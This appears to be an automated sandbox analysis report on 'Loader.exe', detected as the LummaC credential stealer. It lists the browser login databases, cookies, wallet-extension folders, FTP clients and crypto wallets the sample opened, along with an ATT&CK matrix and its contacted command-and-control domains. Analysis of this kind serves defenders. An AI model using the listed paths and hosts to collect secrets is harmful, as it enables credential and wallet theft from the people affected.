Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior

Source: Yara match	File source: 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loader.exe PID: 5396, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Loader.exe PID: 5396, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	241 Security Software Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Loader.exe	40%	Virustotal		Browse
Loader.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cureprouderio.click/apiprog	0%	Avira URL Cloud	safe
https://cureprouderio.click/pi	0%	Avira URL Cloud	safe
https://cureprouderio.click/8D7Qw/Wo	0%	Avira URL Cloud	safe
https://cureprouderio.click/api)	0%	Avira URL Cloud	safe
https://cureprouderio.click/	0%	Avira URL Cloud	safe
https://cureprouderio.click/piD0S	0%	Avira URL Cloud	safe
https://cureprouderio.click/api9	0%	Avira URL Cloud	safe
https://cureprouderio.click/_0	0%	Avira URL Cloud	safe
cureprouderio.click	0%	Avira URL Cloud	safe
https://cureprouderio.click/6CB	0%	Avira URL Cloud	safe
https://cureprouderio.click/;0	0%	Avira URL Cloud	safe
https://cureprouderio.clic	0%	Avira URL Cloud	safe
https://cureprouderio.click/8D7Qw/WoB	0%	Avira URL Cloud	safe
https://cureprouderio.click/c	0%	Avira URL Cloud	safe
https://cureprouderio.click/apiwn	0%	Avira URL Cloud	safe
https://cureprouderio.click/api	0%	Avira URL Cloud	safe
https://cureprouderio.click:443/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cureprouderio.click	172.67.132.7	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cureprouderio.click	true	Avira URL Cloud: safe	unknown
scentniej.buzz	false		high
hummskitnj.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
prisonyfork.buzz	false		high
https://cureprouderio.click/api	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/api9	Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	Loader.exe	false		high
http://ocsp.entrust.net02	Loader.exe	false		high
https://cureprouderio.click/6CB	Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/api)	Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/	Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235035160.0000000002C58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cureprouderio.click/pi	Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/piD0S	Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/ts1ca.crl0	Loader.exe	false		high
https://support.mozilla.org/products/firefoxgro.all	Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cureprouderio.click/_0	Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
